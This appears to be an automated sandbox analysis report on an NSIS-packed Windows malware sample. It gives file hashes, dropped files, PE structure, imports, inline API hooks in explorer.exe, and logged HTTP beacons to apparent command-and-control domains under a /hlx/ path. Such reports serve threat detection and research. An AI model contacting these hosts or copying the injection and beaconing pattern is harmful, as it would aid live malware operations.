                                                                                  SHA-512:977D9A3F41B3AE1D5ADC32926F522BDAB3A77A5472C0A47E63565D8CF6EAEC98C94A3776EA21538E4AFB122F1046F9BB916375B5B632889FFC8ED3430BB0360A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: )..\.L...b~zy....R...u,....B.pp..pb...u<.-V...1....>o.V.Pw....k..:...h.n.Y@M....T..?1.._2....$H........E..G......S.j....S...;..t..,...kY..t..a&...w=..("'...G..6[=..V$...YR..&T..JN..T.i...F...%....a.........H......F...&.r.,.....x.K..]C......v..N...V..GC.&D...Z9)..39t.i0.....+j..I..+...)._.$.~1.+7.H@.W..N.E,z..1.....lQ.....'7...)I&.1....'I\.<..!..5......Q*..C...}.=..q#q.Rf.Tf.?h.SD...R.K..Q[1..n.b.V1.#.Y......6..t.6..Y......8.+7.}.~...K_..B.J........|.R..Q...:.J!....q...{..[F...;...i...e...}...+[.S.....IV?9..)F.....Q..IT.j.%zh.u:.......L(..R.).6"..Dd......-.y.lC.bZ.. ......~.......T..'...}.m.UC.[6...Z ....!Z#...a..........u#.....jp..OM.p.-XM.N.r.x.D...c_M..{;.....#.N.&8.a.3B>.Ht......}m5....K.........p..Q...R..{Z$.Y..qE...#..c.sZ..;.b.O.u. ........U+....6^.D....MQ.#.%..<..@.....v.n.......+&.t.r.3..[.af...R=UL.....6.v..c.v.......m.E.a@c.R:...hJ.T....4w.<.od2\....z.,..\..{...V..:~r.....D.8.q..`V.19....]=...a)U`..'9..K....n!qN.E#.E.w...2i....q.N.9.).
                                                                                  C:\Users\user\AppData\Local\Temp\nsaC26D.tmp
                                                                                  Process:C:\Users\user\Desktop\5SXTKXCnqS.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):278770
                                                                                  Entropy (8bit):7.448079444634977
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:OtbVZanguBdgJ2JdF/ZMqNbatxWREwXeQumQ4T3t:qINkc7RTVXeQued
                                                                                  MD5:C4CB16A32F9F83E70EAE2EDB6FD01FF3
                                                                                  SHA1:9E86174F2952237E5170B532A69BC080FCD59765
                                                                                  SHA-256:C8FE712473694B00B45F2AC8C83E57C0527751C6BA118E2A95F3F5B699B7EE57
                                                                                  SHA-512:8D9FC4DB04C2538B792F720A183A337043F77A846B7A71F3D66405C15F975D98CFF7E63ADDD2CB677454765A7D3C2295E522457DB6A479F7F84753C3F4E119CF
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ._......,.......................xH.......^......y_..........................................................................................................................................................................................................................................J...............#...j...............................................................................................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\nsaC26E.tmp\System.dll
                                                                                  Process:C:\Users\user\Desktop\5SXTKXCnqS.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.855045165595541
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                  • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                  • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                  • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                  • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                  • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                  • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                  • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                  • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                  • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                  • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                  • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                  • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                  • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                  • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                  • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse
                                                                                  • Filename: PO187439.exe, Detection: malicious, Browse
                                                                                  • Filename: 090009000000090.exe, Detection: malicious, Browse
                                                                                  • Filename: NEWORDERLIST.exe, Detection: malicious, Browse
                                                                                  • Filename: 00404000004.exe, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\wkxohdeyqvvyr
                                                                                  Process:C:\Users\user\Desktop\5SXTKXCnqS.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):56657
                                                                                  Entropy (8bit):4.975811547605918
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:5usA23WeP0CJgK679CbFutzrcnrz42c9nvpVid:012meP0Ikuwtvcz4pBWd
                                                                                  MD5:33CC7C93858999843488542395770601
                                                                                  SHA1:D57862368225F9240C279B0C1C1FA9BA7EB4E8CC
                                                                                  SHA-256:F0738E409A7008B653A4E5C86D90CC73021988D59CAE648772305C41D6668BB1
                                                                                  SHA-512:23F7DA5A861CAB4D0F06174BD78978F325B1D19DCECA6ED7A520B7957529B7D1A3EC1CC838EC140C426B0C64784B744AF6E3A4BB4C4514FE30A40E89CDEFFCAF
                                                                                  Malicious:false
                                                                                  Preview: U............@...8.A.....B.....C...i.D...i.E...l.F.....G...=.H.....I.....J...e.K...i.L...l.M.....N...=.O.....P...=.Q.....R.....S...i.T...i.U.....V.....W...m.X...i.Y.....Z...\.[.....\.....]...i.^...i._...i.`.....a...\.b.....c.....d...\.e...I.f.....g.....h.....i...i.j...U.k.....l.....m...\.n...I.o.....p...i.q...i.r.....s...\.t...I.u...).v.....w...\.x...I.y.....z...\.{.....|...!.}.....~...\.............................\...........%.....i.....i.....i...............................................\.............................i.....U.................\.................i.....i...........\...........)...........\.................\...........!...........\.............................\...........a.....i.....i.....i...............................................\.............................i.....U.................\.................i.....i...........\......

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.92465625934964
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:5SXTKXCnqS.exe
                                                                                  File size:245650
                                                                                  MD5:cb4947e5c78ada624d22c28ee9079871
                                                                                  SHA1:eb2c2d329e9be0b3a74582a4fd9c257bc795a690
                                                                                  SHA256:02230fb80db0fe0055730a0af8b3a0c66a578b2c315206053b80bae250c5561d
                                                                                  SHA512:7582aed1984c65c550532ab4a97d6bc5bc45bfceeacdf329467b39667dbcaaa6a28175aa29fef30146e16cbdae903c5381b3d1ea47888f8d29b9f4119a581b26
                                                                                  SSDEEP:3072:DQIURTXJ+McCmF7tC1eb4lhkULBwRLuJTqDW2CLd+d/Lpz3JAdFu4V65bRvSC5aL:Ds9cCmF5SnwvmLd+d/FcU4Y5bRvbRAaa
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                  File Icon

                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x40323c
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:099c0646ea7282d232219f8807883be0

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000180h
                                                                                  push ebx
                                                                                  push ebp
                                                                                  push esi
                                                                                  xor ebx, ebx
                                                                                  push edi
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 00409130h
                                                                                  xor esi, esi
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [00407030h]
                                                                                  push 00008001h
                                                                                  call dword ptr [004070B4h]
                                                                                  push ebx
                                                                                  call dword ptr [0040727Ch]
                                                                                  push 00000008h
                                                                                  mov dword ptr [00423F58h], eax
                                                                                  call 00007F4F08FC0ABEh
                                                                                  mov dword ptr [00423EA4h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 0041F458h
                                                                                  call dword ptr [00407158h]
                                                                                  push 004091B8h
                                                                                  push 004236A0h
                                                                                  call 00007F4F08FC0771h
                                                                                  call dword ptr [004070B0h]
                                                                                  mov edi, 00429000h
                                                                                  push eax
                                                                                  push edi
                                                                                  call 00007F4F08FC075Fh
                                                                                  push ebx
                                                                                  call dword ptr [0040710Ch]
                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                  mov dword ptr [00423EA0h], eax
                                                                                  mov eax, edi
                                                                                  jne 00007F4F08FBDEBCh
                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                  mov eax, 00429001h
                                                                                  push dword ptr [esp+14h]
                                                                                  push eax
                                                                                  call 00007F4F08FC0252h
                                                                                  push eax
                                                                                  call dword ptr [0040721Ch]
                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                  jmp 00007F4F08FBDF15h
                                                                                  cmp cl, 00000020h
                                                                                  jne 00007F4F08FBDEB8h
                                                                                  inc eax
                                                                                  cmp byte ptr [eax], 00000020h
                                                                                  je 00007F4F08FBDEACh
                                                                                  cmp byte ptr [eax], 00000022h
                                                                                  mov byte ptr [eax+eax+00h], 00000000h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                  RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                  RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                  RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                  RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                  RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jun 10, 2021 17:43:43.751054049 CEST4974380192.168.2.5184.168.131.241
                                                                                  Jun 10, 2021 17:43:43.946315050 CEST8049743184.168.131.241192.168.2.5
                                                                                  Jun 10, 2021 17:43:43.946464062 CEST4974380192.168.2.5184.168.131.241
                                                                                  Jun 10, 2021 17:43:43.946809053 CEST4974380192.168.2.5184.168.131.241
                                                                                  Jun 10, 2021 17:43:44.140175104 CEST8049743184.168.131.241192.168.2.5
                                                                                  Jun 10, 2021 17:43:44.176570892 CEST8049743184.168.131.241192.168.2.5
                                                                                  Jun 10, 2021 17:43:44.176592112 CEST8049743184.168.131.241192.168.2.5
                                                                                  Jun 10, 2021 17:43:44.176776886 CEST4974380192.168.2.5184.168.131.241
                                                                                  Jun 10, 2021 17:43:44.176923990 CEST4974380192.168.2.5184.168.131.241
                                                                                  Jun 10, 2021 17:43:44.370253086 CEST8049743184.168.131.241192.168.2.5
                                                                                  Jun 10, 2021 17:44:22.608812094 CEST4974780192.168.2.5184.154.132.108
                                                                                  Jun 10, 2021 17:44:22.757802010 CEST8049747184.154.132.108192.168.2.5
                                                                                  Jun 10, 2021 17:44:22.757914066 CEST4974780192.168.2.5184.154.132.108
                                                                                  Jun 10, 2021 17:44:22.758177042 CEST4974780192.168.2.5184.154.132.108
                                                                                  Jun 10, 2021 17:44:22.907177925 CEST8049747184.154.132.108192.168.2.5
                                                                                  Jun 10, 2021 17:44:23.259699106 CEST4974780192.168.2.5184.154.132.108
                                                                                  Jun 10, 2021 17:44:23.449140072 CEST8049747184.154.132.108192.168.2.5
                                                                                  Jun 10, 2021 17:44:25.261095047 CEST8049747184.154.132.108192.168.2.5
                                                                                  Jun 10, 2021 17:44:25.261128902 CEST8049747184.154.132.108192.168.2.5
                                                                                  Jun 10, 2021 17:44:25.261281013 CEST4974780192.168.2.5184.154.132.108
                                                                                  Jun 10, 2021 17:44:25.261409044 CEST4974780192.168.2.5184.154.132.108

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jun 10, 2021 17:42:18.492783070 CEST5959653192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:18.544855118 CEST53595968.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:19.335189104 CEST6529653192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:19.396466017 CEST53652968.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:19.512371063 CEST6318353192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:19.569057941 CEST53631838.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:20.717751026 CEST6015153192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:20.769731045 CEST53601518.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:21.641571045 CEST5696953192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:21.705450058 CEST53569698.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:22.500428915 CEST5516153192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:22.550810099 CEST53551618.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:23.543167114 CEST5475753192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:23.596529961 CEST53547578.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:24.383204937 CEST4999253192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:24.433361053 CEST53499928.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:25.341476917 CEST6007553192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:25.393908024 CEST53600758.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:26.172918081 CEST5501653192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:26.231343985 CEST53550168.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:27.103193998 CEST6434553192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:27.161875010 CEST53643458.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:42.658490896 CEST5712853192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:42.723411083 CEST53571288.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:42:51.591604948 CEST5479153192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:42:51.652081966 CEST53547918.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:43:13.782732010 CEST5046353192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:43:13.846009016 CEST53504638.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:43:14.053622007 CEST5039453192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:43:14.107042074 CEST53503948.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:43:14.219866991 CEST5853053192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:43:14.285789013 CEST53585308.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:43:34.773329973 CEST5381353192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:43:34.834525108 CEST53538138.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:43:43.679322004 CEST6373253192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:43:43.745172024 CEST53637328.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:43:47.743932962 CEST5734453192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:43:47.812141895 CEST53573448.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:44:13.907901049 CEST5445053192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:44:13.974658012 CEST53544508.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:44:15.050772905 CEST5926153192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:44:15.120481968 CEST53592618.8.8.8192.168.2.5
                                                                                  Jun 10, 2021 17:44:22.509793997 CEST5715153192.168.2.58.8.8.8
                                                                                  Jun 10, 2021 17:44:22.607316017 CEST53571518.8.8.8192.168.2.5

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Jun 10, 2021 17:43:43.679322004 CEST192.168.2.58.8.8.80x8cf7Standard query (0)www.centerstageacademyaz.comA (IP address)IN (0x0001)
                                                                                  Jun 10, 2021 17:44:22.509793997 CEST192.168.2.58.8.8.80x19c5Standard query (0)www.updatesz.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Jun 10, 2021 17:43:43.745172024 CEST8.8.8.8192.168.2.50x8cf7No error (0)www.centerstageacademyaz.comcenterstageacademyaz.comCNAME (Canonical name)IN (0x0001)
                                                                                  Jun 10, 2021 17:43:43.745172024 CEST8.8.8.8192.168.2.50x8cf7No error (0)centerstageacademyaz.com184.168.131.241A (IP address)IN (0x0001)
                                                                                  Jun 10, 2021 17:44:22.607316017 CEST8.8.8.8192.168.2.50x19c5No error (0)www.updatesz.comupdatesz.comCNAME (Canonical name)IN (0x0001)
                                                                                  Jun 10, 2021 17:44:22.607316017 CEST8.8.8.8192.168.2.50x19c5No error (0)updatesz.com184.154.132.108A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.centerstageacademyaz.com
                                                                                  • www.updatesz.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.549743184.168.131.24180C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jun 10, 2021 17:43:43.946809053 CEST3035OUTGET /hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr HTTP/1.1
                                                                                  Host: www.centerstageacademyaz.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jun 10, 2021 17:43:44.176570892 CEST3036INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx/1.16.1
                                                                                  Date: Thu, 10 Jun 2021 15:43:44 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Location: http://centerstage.academy/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.549747184.154.132.10880C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jun 10, 2021 17:44:22.758177042 CEST3088OUTGET /hlx/?wVSH=1q0nvnuESuCKkKkbLudmlC1kRF8eq+dUTLEJwYL638OOvnGjESXIW61pqUjqlD08HWSv&i0D=adKPlr HTTP/1.1
                                                                                  Host: www.updatesz.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jun 10, 2021 17:44:25.261095047 CEST3089INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Thu, 10 Jun 2021 15:44:21 GMT
                                                                                  Server: Apache/2.4.46 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4 Phusion_Passenger/6.0.7
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://updatesz.com/hlx/?wVSH=1q0nvnuESuCKkKkbLudmlC1kRF8eq+dUTLEJwYL638OOvnGjESXIW61pqUjqlD08HWSv&i0D=adKPlr
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                  Code Manipulations

                                                                                  User Modules

                                                                                  Hook Summary

                                                                                  Function NameHook TypeActive in Processes
                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                  GetMessageWINLINEexplorer.exe
                                                                                  GetMessageAINLINEexplorer.exe

                                                                                  Processes

                                                                                  Process: explorer.exe, Module: user32.dll
                                                                                  Function NameHook TypeNew Data
                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: 5SXTKXCnqS.exe PID: 5828 Parent PID: 5720

                                                                                  General

                                                                                  Start time:17:42:26
                                                                                  Start date:10/06/2021
                                                                                  Path:C:\Users\user\Desktop\5SXTKXCnqS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\5SXTKXCnqS.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:245650 bytes
                                                                                  MD5 hash:CB4947E5C78ADA624D22C28EE9079871
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
